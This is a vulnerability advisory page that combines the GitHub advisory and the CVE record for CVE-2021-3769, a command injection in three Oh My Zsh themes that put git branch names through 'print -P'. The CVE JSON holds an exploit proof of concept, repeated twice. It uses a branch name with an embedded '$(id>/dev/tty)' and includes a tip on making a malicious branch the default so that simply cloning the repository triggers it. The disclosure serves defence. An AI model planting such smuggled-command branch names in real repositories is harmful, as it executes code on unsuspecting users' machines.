GHSA-F8R6-C3HP-CCV4

Vulnerability from github – Published: 2021-12-01 00:00 – Updated: 2021-12-02 00:01

Details

Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes Description: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited. Fixed in: b3ba9978. Impacted areas: - `pygmalion` theme. - `pygmalion-virtualenv` theme. - `refined` theme.

{
  "affected": [],
  "aliases": [
    "CVE-2021-3769"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-11-30T10:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "# Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes **Description**: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited. **Fixed in**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978). **Impacted areas**: - `pygmalion` theme. - `pygmalion-virtualenv` theme. - `refined` theme.",
  "id": "GHSA-f8r6-c3hp-ccv4",
  "modified": "2021-12-02T00:01:08Z",
  "published": "2021-12-01T00:00:43Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3769"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

CVE-2021-3769 (GCVE-0-2021-3769)

Vulnerability from cvelistv5 – Published: 2021-11-30 09:30 – Updated: 2024-08-03 17:09

Title

OS Command Injection in ohmyzsh/ohmyzsh

Summary

# Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes **Description**: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited. **Fixed in**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978). **Impacted areas**: - `pygmalion` theme. - `pygmalion-virtualenv` theme. - `refined` theme.

Severity ?

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-78 - OS Command Injection

Assigner

@huntrdev

References

URL

Tags

https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978

x_refsource_MISC

Impacted products

	Vendor	Product	Version
	ohmyzsh	ohmyzsh/ohmyzsh	Affected: unspecified , < b3ba9978 (custom)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T17:09:08.686Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "ohmyzsh/ohmyzsh",
          "vendor": "ohmyzsh",
          "versions": [
            {
              "lessThan": "b3ba9978",
              "status": "affected",
              "version": "unspecified",
              "versionType": "custom"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "# Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes **Description**: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited. **Fixed in**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978). **Impacted areas**: - `pygmalion` theme. - `pygmalion-virtualenv` theme. - `refined` theme."
        }
      ],
      "exploits": [
        {
          "lang": "en",
          "value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Enable the `pygmalion`, `pygmalion-virtualenv` or `refined` themes.\n3. Create and `cd` into a new git repository: `git init bad-repo \u0026\u0026 cd bad-repo`.\n4. Create and switch to a new branch with a name containing either `$(\u003cinjected-command\u003e`, \u003ccode\u003e\\`\\\u003cinjected-command\\\u003e\\`\u003c/code\u003e or `${(e):-\"\u003cinjected-command\u003e\"}`:\n\n   ```sh\n   badbranch=\u0027feat/bad-branch$(id\u003e/dev/tty)\u0027\n   git checkout -b \"$badbranch\"\n   ```\n\n   In the `pygmalion` theme, the prompt changes changes from the default branch to:\n\n   ```console\n   user@host:~/exploit-poc|master \u21d2  badbranch=\u0027feat/bad-branch$(id\u003e/dev/tty)\u0027; git checkout -b \"$badbranch\"\n   Switched to a new branch \u0027feat/bad-branch$(id\u003e/dev/tty)\u0027\n   uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n   uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n   user@host:~/exploit-poc|feat/bad-branch \u21d2 \n   ```\n\n   A similar thing happens in `pygmalion-virtualenv` and `refined` themes.\n\nNOTE: for maximum impact, you can define the malicious branch name as the default branch name in GitHub, so that when a user clones it for the first time and enters the repository, the malicious branch is automatically checked out. That means that the user only needs to clone and enter the repository for the exploit to work.\n"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-78",
              "description": "CWE-78 OS Command Injection",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-11-30T09:30:18",
        "orgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
        "shortName": "@huntrdev"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978"
        }
      ],
      "title": "OS Command Injection in ohmyzsh/ohmyzsh",
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "security@huntr.dev",
          "ID": "CVE-2021-3769",
          "STATE": "PUBLIC",
          "TITLE": "OS Command Injection in ohmyzsh/ohmyzsh"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "ohmyzsh/ohmyzsh",
                      "version": {
                        "version_data": [
                          {
                            "version_affected": "\u003c",
                            "version_value": "b3ba9978"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "ohmyzsh"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "# Vulnerability in `pygmalion`, `pygmalion-virtualenv` and `refined` themes **Description**: these themes use `print -P` on user-supplied strings to print them to the terminal. All of them do that on git information, particularly the branch name, so if the branch has a specially-crafted name the vulnerability can be exploited. **Fixed in**: [b3ba9978](https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978). **Impacted areas**: - `pygmalion` theme. - `pygmalion-virtualenv` theme. - `refined` theme."
            }
          ]
        },
        "exploit": [
          {
            "lang": "en",
            "value": "**Exploit PoC**:\n\n1. Install Oh My Zsh.\n2. Enable the `pygmalion`, `pygmalion-virtualenv` or `refined` themes.\n3. Create and `cd` into a new git repository: `git init bad-repo \u0026\u0026 cd bad-repo`.\n4. Create and switch to a new branch with a name containing either `$(\u003cinjected-command\u003e`, \u003ccode\u003e\\`\\\u003cinjected-command\\\u003e\\`\u003c/code\u003e or `${(e):-\"\u003cinjected-command\u003e\"}`:\n\n   ```sh\n   badbranch=\u0027feat/bad-branch$(id\u003e/dev/tty)\u0027\n   git checkout -b \"$badbranch\"\n   ```\n\n   In the `pygmalion` theme, the prompt changes changes from the default branch to:\n\n   ```console\n   user@host:~/exploit-poc|master \u21d2  badbranch=\u0027feat/bad-branch$(id\u003e/dev/tty)\u0027; git checkout -b \"$badbranch\"\n   Switched to a new branch \u0027feat/bad-branch$(id\u003e/dev/tty)\u0027\n   uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n   uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n   user@host:~/exploit-poc|feat/bad-branch \u21d2 \n   ```\n\n   A similar thing happens in `pygmalion-virtualenv` and `refined` themes.\n\nNOTE: for maximum impact, you can define the malicious branch name as the default branch name in GitHub, so that when a user clones it for the first time and enters the repository, the malicious branch is automatically checked out. That means that the user only needs to clone and enter the repository for the exploit to work.\n"
          }
        ],
        "impact": {
          "cvss": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "CWE-78 OS Command Injection"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978",
              "refsource": "MISC",
              "url": "https://github.com/ohmyzsh/ohmyzsh/commit/b3ba9978"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "c09c270a-b464-47c1-9133-acb35b22c19a",
    "assignerShortName": "@huntrdev",
    "cveId": "CVE-2021-3769",
    "datePublished": "2021-11-30T09:30:18",
    "dateReserved": "2021-09-05T00:00:00",
    "dateUpdated": "2024-08-03T17:09:08.686Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

GHSA-F8R6-C3HP-CCV4

CVE-2021-3769 (GCVE-0-2021-3769)

Tags

Sightings

Nomenclature